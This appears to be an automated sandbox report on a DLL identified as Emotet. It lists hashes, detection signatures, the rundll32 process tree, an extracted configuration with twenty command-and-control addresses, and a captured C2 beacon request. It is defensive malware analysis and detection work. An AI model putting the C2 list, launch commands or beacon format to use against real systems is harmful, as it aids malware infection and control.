Play interactive tour

Edit tour

Windows Analysis Report qrb6jVwzoe

Overview

General Information

Sample Name:	qrb6jVwzoe (renamed file extension from none to dll)
Analysis ID:	528000
MD5:	56547488fb182b73f83211903ce2dd30
SHA1:	e3c962932fb99e7685ea989356d60afc4045c52f
SHA256:	bf0cadbc8a6b28a54eb0db5f2afe582a02d5f1dedb058097abc1d7b43ba7deb0
Tags:	32dllexetrojan
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

PE file contains an invalid checksum

PE file contains strange resources

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7156 cmdline: loaddll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 4716 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 580 cmdline: rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6240 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5184 cmdline: rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6228 cmdline: rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6376 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 6100 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6320 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.359659135.0000000000FA6000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.363179746.0000000000B42000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000003.359231508.0000000000B46000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000003.494236269.0000000003233000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000003.359880008.0000000000C16000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000003.359009454.0000000000B46000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000003.431973841.0000000003233000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.365562801.0000000000F66000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000003.382797966.0000000003233000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.877277824.0000000003233000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000003.359302351.0000000000C16000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.361400733.0000000000BDA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
8.3.rundll32.exe.3246c20.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.fa6a40.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.3.rundll32.exe.3246c20.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.f66ce0.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.3.rundll32.exe.3246c20.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.3.rundll32.exe.3246c20.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.3.rundll32.exe.b46c68.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.3.rundll32.exe.b46c68.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.c16c78.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.f66ce0.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.fa6a40.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.3.rundll32.exe.3246c20.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.c16c78.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.3.rundll32.exe.b46c68.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.3246c20.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.3246c20.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.3.rundll32.exe.3246c20.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.3.rundll32.exe.c16c78.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.3.rundll32.exe.c16c78.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.3.rundll32.exe.b46c68.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.b46c68.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.b46c68.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 17 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6416, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL, ProcessId: 6376

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 8.3.rundll32.exe.3246c20.1.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Machine Learning detection for sample

Show sources

Source: qrb6jVwzoe.dll

Joe Sandbox ML: detected

Source: qrb6jVwzoe.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.6:49755 version: TLS 1.2

Source: qrb6jVwzoe.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F32188A FindFirstFileExW,	3_2_6F32188A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6F32188A FindFirstFileExW,	4_2_6F32188A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10011A80 FindFirstFileW,	8_2_10011A80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.6:49755 -> 51.178.61.60:443
Source: Traffic	Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.6:49756 -> 168.197.250.14:80
Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.6:49757 -> 45.79.33.48:8080
Source: Traffic	Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.6:49760 -> 196.44.98.190:8080
Source: Traffic	Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.6:49783 -> 177.72.80.14:7080
Source: Traffic	Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 177.72.80.14:7080 -> 192.168.2.6:49783

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 196.44.98.190 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 177.72.80.14 168	Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic

HTTP traffic detected: GET /BCcDzRknSjFPjuOxHLZvVqcO HTTP/1.1Cookie: QMpLEjjFd=c4U8GYO3gBQ2KCd18VNTs9PT8hpdVNqj4zLzgZE1fFI9x0SPtcMipNFNESf8CsAVem5JWMqQ8ndGaJ1DdBO6E5KdfcNjE1YapLmU92FtgBNQbP19LEuO+ya4SHRYKzrZSycrfZTK0DPGNQZNeJ6j1cioezM7bzeTQ/thQoUAbkNL0mgdSgnH4s5+Omur7YLxQg0NgsR41aDxprzsQzXD6m2hLQv3kzo0+dQAtysUr4iTrR26F9NeGzF2zkgnUERUJbSQGPdy5NBtzT8NJyvrR6k15te4INQfbmWwqTBzGbEzsQ==Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190

Source: global traffic	TCP traffic: 192.168.2.6:49757 -> 45.79.33.48:8080
Source: global traffic	TCP traffic: 192.168.2.6:49760 -> 196.44.98.190:8080
Source: global traffic	TCP traffic: 192.168.2.6:49783 -> 177.72.80.14:7080

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Nov 2021 15:49:10 GMTContent-Type: text/htmlContent-Length: 162Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 168.197.250.14
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 45.79.33.48
Source: unknown	TCP traffic detected without corresponding DNS query: 196.44.98.190
Source: unknown	TCP traffic detected without corresponding DNS query: 196.44.98.190
Source: unknown	TCP traffic detected without corresponding DNS query: 196.44.98.190
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14
Source: unknown	TCP traffic detected without corresponding DNS query: 177.72.80.14

Source: svchost.exe, 00000010.00000003.472140574.00000283AB37D000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z\|\|.\|\|797d024d-8c74-4faa-b6a6-08435801478b\|\|1152921505694213184\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000010.00000003.472140574.00000283AB37D000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z\|\|.\|\|797d024d-8c74-4faa-b6a6-08435801478b\|\|1152921505694213184\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"

Source: svchost.exe, 00000010.00000002.488148840.00000283AB300000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859918261.0000015DEBE88000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000010.00000002.488035561.00000283AAAEF000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859918261.0000015DEBE88000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000010.00000003.468408043.00000283AB37D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.468696929.00000283AB802000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000015.00000003.859010868.0000015DE68AA000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859621352.0000015DE68AC000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xml
Source: svchost.exe, 00000015.00000003.859010868.0000015DE68AA000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859621352.0000015DE68AC000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anon
Source: svchost.exe, 00000015.00000003.859010868.0000015DE68AA000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859621352.0000015DE68AC000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
Source: svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000010.00000003.469550789.00000283AB39E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.469585503.00000283AB3B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_10021027 InternetReadFile,

8_2_10021027

Source: global traffic

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.6:49755 version: TLS 1.2

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.3.rundll32.exe.3246c20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.fa6a40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.3246c20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.f66ce0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.3246c20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.3246c20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.b46c68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.b46c68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.c16c78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.f66ce0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.fa6a40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.rundll32.exe.3246c20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.c16c78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.b46c68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.3246c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.3246c20.0.unpack, type: UNPACKEDPE
